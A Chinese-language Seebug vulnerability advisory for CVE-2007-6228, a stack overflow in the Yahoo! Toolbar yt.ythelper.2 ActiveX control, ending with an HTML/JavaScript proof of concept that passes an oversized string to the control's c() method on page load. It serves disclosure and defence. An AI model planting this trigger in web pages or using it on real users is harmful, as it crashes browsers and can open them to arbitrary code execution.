Yahoo! Toolbar yt.ythelper.2 ActiveX控件栈溢出漏洞

2011-12-02T00:00:00
ID SSV:26001
Type seebug
Reporter Root
Modified 2011-12-02T00:00:00

Description

BUGTRAQ ID: 26656 CVE(CAN) ID: CVE-2007-6228

Yahoo! Toolbar是一个IE插件,能够通过嵌入IE的工具栏帮助快速使用Yahoo搜索引擎、收发Yahoo电子邮件等操作。

Yahoo! Toolbar的ActiveX控件实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。

Yahoo! Toolbar所安装的yt.ythelper.2 ActiveX控件没有正确地验证对c()方式所传送的参数,如果用户受骗访问了恶意网页并向该方式传送了超长参数的话,就可能触发栈溢出,导致浏览器崩溃或执行任意指令。

Yahoo! Toolbar 1.4.1 厂商补丁:

Yahoo!

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://toolbar.yahoo.com/

                                        
                                            
                                                <html>
<head>
  <script language="JavaScript" DEFER>
    function Check() {
    var s = "AAAA";

     while (s.length < 999999) s=s+s;

     var obj = new ActiveXObject("yt.ythelper.2"); //{02478D38-C3F9-4EFB-9B51-7695ECA05670}
      obj.c(s);
   }
  </script>

</head>
<body onload="JavaScript: return Check();">
</body>
</html>